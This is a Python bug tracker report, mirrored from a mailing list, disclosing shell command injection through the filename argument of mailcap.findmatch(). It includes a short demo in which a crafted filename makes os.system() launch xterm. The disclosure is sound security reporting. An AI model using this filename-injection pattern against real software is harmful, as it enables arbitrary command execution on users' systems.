New submission from Bernd Dietzel: if the filename contains Shell Commands they will be executed if they are passed to os.system() as discribed in the docs. Filename should be quoted with quote(filename) to fix the bug.
https://docs.python.org/2/library/mailcap.html "mailcap.findmatch(/caps/, /MIMEtype/[, /key/[, /filename/[, /plist/]]]) Return a 2-tuple; the first element is a string containing the command line to be executed (which can be passed to*os.system() *), ......" Exploid Demo wich runs xterm but should not : ============================= import mailcap d=mailcap.getcaps() commandline,MIMEtype=mailcap.findmatch(d, "text/*", filename="'$(xterm);#.txt") ## commandline = "less ''$(xterm);#.txt'" import os os.system(commandline) ## xterm starts ============================= By the way ... please do not use os.system() in your code, makes it unsafe. Best regards Bernd Dietzel Germany ---------- components: Library (Lib) files: screenshot.png messages: 247857 nosy: TheRegRunner priority: normal severity: normal status: open title: mailcap.findmatch() ........ Shell Command Injection in filename type: security versions: Python 2.7 Added file: http://bugs.python.org/file40099/screenshot.png _______________________________________ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue24778> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
